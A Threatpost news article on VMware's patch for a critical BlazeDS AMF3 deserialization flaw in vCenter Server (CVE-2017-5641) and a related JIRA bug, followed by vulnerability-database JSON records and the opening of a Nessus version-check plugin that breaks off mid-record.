VMWare Fixes Critical RCE in vCenter Server

2017-04-17T12:05:26

Description

VMware patched a critical vulnerability in its vCenter Server platform late last week that could have let an attacker execute arbitrary code in some scenarios. The [vulnerability](<https://www.vmware.com/security/advisories/VMSA-2017-0007.html>) affected two versions of vCenter, 6.5 and 6.0. Users are encouraged to update to the most recent versions, 6.5c, and 6.0U3b, pushed on Thursday. > Today we've published a new [#VMware](<https://twitter.com/hashtag/VMware?src=hash>) Security Advisory VMSA-2017-0007 for vCenter Server <https://t.co/YqV5zNlJXw> > > — VMware Sec Response (@VMwareSRC) [April 14, 2017](<https://twitter.com/VMwareSRC/status/852730585122430977>) US-CERT warned about the vulnerability, stressing exploitation could result in an attacker taking control of an affected system, in [an alert posted on Friday](<https://www.us-cert.gov/ncas/current-activity/2017/04/14/VMware-Releases-Security-Updates>). vCenter Server, formerly known as VirtualCenter, is a tool used for managing vSphere virtual environments. The vulnerability technically stems from the usage of BlazeDS to process AMF3 messages. BlazeDS, originally developed by Adobe, is a server-based Java remoting and web-based messaging technology. AMF3, or Action Message Format 3, is a compact binary is a message format, also developed by Adobe, used by Flash apps to communicate and to serialize ActionScript object graphs. The vulnerability could allow an attacker to execute arbitrary code when deserializing an untrusted Java object, according to VMware’s security advisory. VMware says the issue (CVE-2017-5641) is present in the Customer Experience Improvement Program (CEIP) functionality of the platform. Even if a user has opted out of the functionality, the vulnerability still exists, VMware claims. Markus Wulftange, a penetration tester at the German security firm Code White discovered the AMF bug and published a thorough write-up [earlier this month](<http://codewhitesec.blogspot.com/2017/04/amf.html>). > VMware vCenter Server 6.x affected by the AMF bug in BlazeDS (<https://t.co/eIO3xiXb0H>) <https://t.co/l9Z5Slazvf> > > — Markus Wulftange (@mwulftange) [April 14, 2017](<https://twitter.com/mwulftange/status/852905346440077312>) Wulftange disclosed the vulnerabilities, insecure deserialization and XML external entities references, to US-CERT two weeks ago and suggested at the time they could affect products made by VMware, along with Atlassian, HPE, and SonicWall. Atlassian, for its part, fixed the vulnerability, which affected JIRA ([CVE-2017-5983](<https://jira.atlassian.com/browse/JRASERVER-64077?jql=labels%20%3D%20CVE-2017-5983>)), several weeks ago. According to a JIRA ticket on the vulnerability, the bug affected versions from 4.2.4 prior to version 6.3.0 and fetched a CVSS rating of 9.8. In addition to remote code execution, the vulnerability also could have lead to the disclosure of private files or the execution of a denial of service attack against a JIRA server. According to [US-CERT’s Vulnerability Note](<https://www.kb.cert.org/vuls/id/307983>) on Wulftange’s findings, it’s still unknown whether HPE, SonicWall, or Exadel software is affected.

{"id": "THREATPOST:D5751787CAB157440E673DD8A0EADEC5", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "VMWare Fixes Critical RCE in vCenter Server", "description": "VMware patched a critical vulnerability in its vCenter Server platform late last week that could have let an attacker execute arbitrary code in some scenarios.\n\nThe [vulnerability](<https://www.vmware.com/security/advisories/VMSA-2017-0007.html>) affected two versions of vCenter, 6.5 and 6.0. Users are encouraged to update to the most recent versions, 6.5c, and 6.0U3b, pushed on Thursday.\n\n> Today we've published a new [#VMware](<https://twitter.com/hashtag/VMware?src=hash>) Security Advisory VMSA-2017-0007 for vCenter Server <https://t.co/YqV5zNlJXw>\n> \n> \u2014 VMware Sec Response (@VMwareSRC) [April 14, 2017](<https://twitter.com/VMwareSRC/status/852730585122430977>)\n\nUS-CERT warned about the vulnerability, stressing exploitation could result in an attacker taking control of an affected system, in [an alert posted on Friday](<https://www.us-cert.gov/ncas/current-activity/2017/04/14/VMware-Releases-Security-Updates>).\n\nvCenter Server, formerly known as VirtualCenter, is a tool used for managing vSphere virtual environments.\n\nThe vulnerability technically stems from the usage of BlazeDS to process AMF3 messages. BlazeDS, originally developed by Adobe, is a server-based Java remoting and web-based messaging technology. AMF3, or Action Message Format 3, is a compact binary is a message format, also developed by Adobe, used by Flash apps to communicate and to serialize ActionScript object graphs.\n\nThe vulnerability could allow an attacker to execute arbitrary code when deserializing an untrusted Java object, according to VMware\u2019s security advisory.\n\nVMware says the issue (CVE-2017-5641) is present in the Customer Experience Improvement Program (CEIP) functionality of the platform. Even if a user has opted out of the functionality, the vulnerability still exists, VMware claims.\n\nMarkus Wulftange, a penetration tester at the German security firm Code White discovered the AMF bug and published a thorough write-up [earlier this month](<http://codewhitesec.blogspot.com/2017/04/amf.html>).\n\n> VMware vCenter Server 6.x affected by the AMF bug in BlazeDS (<https://t.co/eIO3xiXb0H>) <https://t.co/l9Z5Slazvf>\n> \n> \u2014 Markus Wulftange (@mwulftange) [April 14, 2017](<https://twitter.com/mwulftange/status/852905346440077312>)\n\nWulftange disclosed the vulnerabilities, insecure deserialization and XML external entities references, to US-CERT two weeks ago and suggested at the time they could affect products made by VMware, along with Atlassian, HPE, and SonicWall.\n\nAtlassian, for its part, fixed the vulnerability, which affected JIRA ([CVE-2017-5983](<https://jira.atlassian.com/browse/JRASERVER-64077?jql=labels%20%3D%20CVE-2017-5983>)), several weeks ago. According to a JIRA ticket on the vulnerability, the bug affected versions from 4.2.4 prior to version 6.3.0 and fetched a CVSS rating of 9.8. In addition to remote code execution, the vulnerability also could have lead to the disclosure of private files or the execution of a denial of service attack against a JIRA server.\n\nAccording to [US-CERT\u2019s Vulnerability Note](<https://www.kb.cert.org/vuls/id/307983>) on Wulftange\u2019s findings, it\u2019s still unknown whether HPE, SonicWall, or Exadel software is affected.\n", "published": "2017-04-17T12:05:26", "modified": "2017-04-17T17:20:38", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/vmware-fixes-critical-rce-in-vcenter-server/125000/", "reporter": "Chris Brook", "references": ["https://www.vmware.com/security/advisories/VMSA-2017-0007.html", "https://twitter.com/hashtag/VMware?src=hash", "https://t.co/YqV5zNlJXw", "https://twitter.com/VMwareSRC/status/852730585122430977", "https://www.us-cert.gov/ncas/current-activity/2017/04/14/VMware-Releases-Security-Updates", "http://codewhitesec.blogspot.com/2017/04/amf.html", "https://t.co/eIO3xiXb0H", "https://t.co/l9Z5Slazvf", "https://twitter.com/mwulftange/status/852905346440077312", "https://jira.atlassian.com/browse/JRASERVER-64077?jql=labels%20%3D%20CVE-2017-5983", "https://www.kb.cert.org/vuls/id/307983"], "cvelist": ["CVE-2017-5641", "CVE-2017-5983"], "immutableFields": [], "lastseen": "2018-10-06T22:53:49", "viewCount": 36, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:JRA-64077", "ATLASSIAN:JRASERVER-64077", "JRASERVER-64077"]}, {"type": "avleonov", "idList": ["AVLEONOV:77E5BDCD31BFF42A59B6BE11B5F5598C"]}, {"type": "cert", "idList": ["VU:307983"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0387"]}, {"type": "cve", "idList": ["CVE-2017-5641", "CVE-2017-5983"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785037"]}, {"type": "nessus", "idList": ["JIRA_6_3.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "VMWARE_VCENTER_VMSA-2017-0007.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106758", "OPENVAS:1361412562310140254"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151535"]}, {"type": "seebug", "idList": ["SSV:92913", "SSV:92914", "SSV:97242"]}, {"type": "vmware", "idList": ["VMSA-2017-0007"]}, {"type": "zdi", "idList": ["ZDI-22-506", "ZDI-22-507"]}, {"type": "zdt", "idList": ["1337DAY-ID-32135"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:JRA-64077", "ATLASSIAN:JRASERVER-64077"]}, {"type": "avleonov", "idList": ["AVLEONOV:77E5BDCD31BFF42A59B6BE11B5F5598C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0387"]}, {"type": "cve", "idList": ["CVE-2017-5983"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785037"]}, {"type": "nessus", "idList": ["VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "VMWARE_VCENTER_VMSA-2017-0007.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106758", "OPENVAS:1361412562310140254"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151535"]}, {"type": "seebug", "idList": ["SSV:92913", "SSV:92914"]}, {"type": "threatpost", "idList": ["THREATPOST:BE91204CEA3EE037418B65F7B3DD341D", "THREATPOST:C5F665F5D6B433BE3EDE312E70B0708A"]}, {"type": "vmware", "idList": ["VMSA-2017-0007"]}, {"type": "zdi", "idList": ["ZDI-22-506", "ZDI-22-507"]}, {"type": "zdt", "idList": ["1337DAY-ID-32135"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-5641", "epss": "0.066350000", "percentile": "0.926530000", "modified": "2023-03-15"}, {"cve": "CVE-2017-5983", "epss": "0.023460000", "percentile": "0.880710000", "modified": "2023-03-15"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1678917980, "score": 1698837370, "epss": 1678938645}, "_internal": {"score_hash": "858f73251040d047cbd49b5a3f495360"}}

{"cve": [{"lastseen": "2023-12-03T15:30:31", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-28T15:29:00", "type": "cve", "title": "CVE-2017-5641", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2023-11-07T02:49:00", "cpe": ["cpe:/a:apache:flex_blazeds:4.7.2"], "id": "CVE-2017-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:flex_blazeds:4.7.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:32:25", "description": "The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-10T15:59:00", "type": "cve", "title": "CVE-2017-5983", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5983"], "modified": "2017-04-15T01:01:00", "cpe": ["cpe:/a:atlassian:jira:4.4.3", "cpe:/a:atlassian:jira:5.2.5", "cpe:/a:atlassian:jira:6.1.8", "cpe:/a:atlassian:jira:6.0.5", "cpe:/a:atlassian:jira:6.2.4", "cpe:/a:atlassian:jira:4.3.1", "cpe:/a:atlassian:jira:6.2", "cpe:/a:atlassian:jira:6.1.5", "cpe:/a:atlassian:jira:4.3.4", "cpe:/a:atlassian:jira:6.0.8", "cpe:/a:atlassian:jira:5.0.7", "cpe:/a:atlassian:jira:5.2.8", "cpe:/a:atlassian:jira:5.1.4", "cpe:/a:atlassian:jira:4.4.1", "cpe:/a:atlassian:jira:6.1.2", "cpe:/a:atlassian:jira:6.2.6", "cpe:/a:atlassian:jira:5.1.6", "cpe:/a:atlassian:jira:5.0.5", "cpe:/a:atlassian:jira:5.2.4", "cpe:/a:atlassian:jira:6.0.2", "cpe:/a:atlassian:jira:6.0.1", "cpe:/a:atlassian:jira:5.1.2", "cpe:/a:atlassian:jira:5.1.7", "cpe:/a:atlassian:jira:5.1.5", "cpe:/a:atlassian:jira:6.0.4", "cpe:/a:atlassian:jira:6.2.3", "cpe:/a:atlassian:jira:5.0.3", "cpe:/a:atlassian:jira:6.1.3", "cpe:/a:atlassian:jira:6.2.2", "cpe:/a:atlassian:jira:6.0.3", "cpe:/a:atlassian:jira:5.2.3", "cpe:/a:atlassian:jira:5.0.2", "cpe:/a:atlassian:jira:6.1.7", "cpe:/a:atlassian:jira:4.4.2", "cpe:/a:atlassian:jira:4.4.4", "cpe:/a:atlassian:jira:6.0.7", "cpe:/a:atlassian:jira:5.0", "cpe:/a:atlassian:jira:4.4", "cpe:/a:atlassian:jira:5.2.2", "cpe:/a:atlassian:jira:5.0.1", "cpe:/a:atlassian:jira:5.2.7", "cpe:/a:atlassian:jira:6.2.7", "cpe:/a:atlassian:jira:6.0", "cpe:/a:atlassian:jira:4.4.5", "cpe:/a:atlassian:jira:6.1.9", "cpe:/a:atlassian:jira:4.3", "cpe:/a:atlassian:jira:6.2.5", "cpe:/a:atlassian:jira:6.1.6", "cpe:/a:atlassian:jira:6.2.1", "cpe:/a:atlassian:jira:6.1.4", "cpe:/a:atlassian:jira:5.2.11", "cpe:/a:atlassian:jira:5.2.10", "cpe:/a:atlassian:jira:5.1.8", "cpe:/a:atlassian:jira:5.2", "cpe:/a:atlassian:jira:5.2.9", "cpe:/a:atlassian:jira:6.1.1", "cpe:/a:atlassian:jira:5.1", "cpe:/a:atlassian:jira:4.3.2", "cpe:/a:atlassian:jira:6.1", "cpe:/a:atlassian:jira:5.2.6", "cpe:/a:atlassian:jira:5.1.1", "cpe:/a:atlassian:jira:5.1.3", "cpe:/a:atlassian:jira:4.3.3", "cpe:/a:atlassian:jira:4.2.4", "cpe:/a:atlassian:jira:5.2.1", "cpe:/a:atlassian:jira:5.0.4"], "id": "CVE-2017-5983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5983", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:jira:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:jira:6.1.8:*:*:*:*:*:*:*"]}], "github": [{"lastseen": "2023-12-03T17:28:06", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:02:10", "type": "github", "title": "Apache Flex BlazeDS unsafe deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2023-10-06T21:11:50", "id": "GHSA-W8V7-PRHW-XJPW", "href": "https://github.com/advisories/GHSA-w8v7-prhw-xjpw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T16:13:53", "description": "flex-messenger-core is vulnerable to remote code execution (RCE). The AMF3 deserializers in the library allows the instantiation of arbitrary classes via parameter-less java beans constructors. This allows a malicious user to send a malicious AMF3 object to the system to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T08:05:24", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T18:29:52", "id": "VERACODE:3853", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3853/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T03:15:50", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-12-28T15:29:00", "type": "prion", "title": "Deserialization of untrusted data", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2022-04-19T16:06:00", "id": "PRION:CVE-2017-5641", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:16:22", "description": "The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-10T15:59:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5983"], "modified": "2017-04-15T01:01:00", "id": "PRION:CVE-2017-5983", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5983", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-12-05T14:53:02", "description": "The version of VMware vCenter Server Appliance installed on the remote host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "nessus", "title": "VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server_appliance"], "id": "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/99474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99474);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2017-5641\");\n script_bugtraq_id(97383);\n script_xref(name:\"VMSA\", value:\"2017-0007\");\n script_xref(name:\"CERT\", value:\"307983\");\n\n script_name(english:\"VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Server Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server Appliance installed on the remote\nhost is 6.0 prior to Update 3b or 6.5 prior to Update c. It is,\ntherefore, affected by a flaw in FlexBlazeDS when processing AMF3\nmessages due to allowing the instantiation of arbitrary classes when\ndeserializing objects. An unauthenticated, remote attacker can exploit\nthis, by sending a specially crafted Java object, to execute arbitrary\ncode.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2017-0007.html\");\n # 